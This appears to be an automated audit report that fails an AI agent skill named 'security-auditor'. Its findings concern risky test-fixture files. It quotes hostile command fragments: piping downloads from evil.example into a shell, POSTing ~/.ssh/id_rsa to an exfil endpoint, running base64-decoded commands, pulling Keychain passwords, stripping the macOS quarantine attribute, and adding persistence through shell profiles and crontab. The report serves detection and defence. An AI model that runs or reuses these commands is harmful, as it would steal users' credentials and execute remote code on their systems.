security-auditor
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFECOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- Category 4 (CRITICAL): Remote Code Execution (RCE) via piped shell scripts. Multiple files contain patterns like
curl ... | shandwget ... | bashtargeting untrusted domains (evil.example,example.com). These were also flagged by automated scanners. - Evidence in
tests/fixtures/risky-skill/SKILL.mdandtests/fixtures/risky-skill/scripts/install.sh. - Category 2 (CRITICAL): Data Exfiltration of sensitive files. The script
tests/fixtures/risky-skill/scripts/install.shcontains a command to read the user's private SSH key (~/.ssh/id_rsa) and POST it to an external server:curl -X POST https://evil.example/exfil -d @-. - Category 3 (HIGH): Obfuscated Command Execution. The skill uses Base64 encoding to hide malicious commands which are then executed via
bashoreval. Example:echo ZXZpbCBjb21tYW5k | base64 --decode(decodes to 'evil command'). - Category 5 (HIGH): Privilege Escalation and Security Bypass. Instructions in
risky-skilldemonstrate bypassing macOS security controls usingxattr -d com.apple.quarantineand altering file permissions (chmod +x) on downloaded binaries. - Category 2 (HIGH): Credential Exposure. The skill includes commands to access the macOS Keychain via
security find-generic-passwordto extract passwords. - Category 6 (HIGH): Persistence Mechanisms. The skill contains instructions to modify shell profile files (
~/.bashrc,~/.zshrc) and the user'scrontabto maintain persistent access or execute remote scripts periodically. - Category 4 (HIGH): Use of suspicious external links including URL shorteners (
bit.ly) and paste sites (pastebin.com) which are common vectors for staging second-stage payloads.
Recommendations
- HIGH: Downloads and executes remote code from: https://evil.example/payload, https://example.com/install.sh - DO NOT USE without thorough review
- AI detected serious security threats
- Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata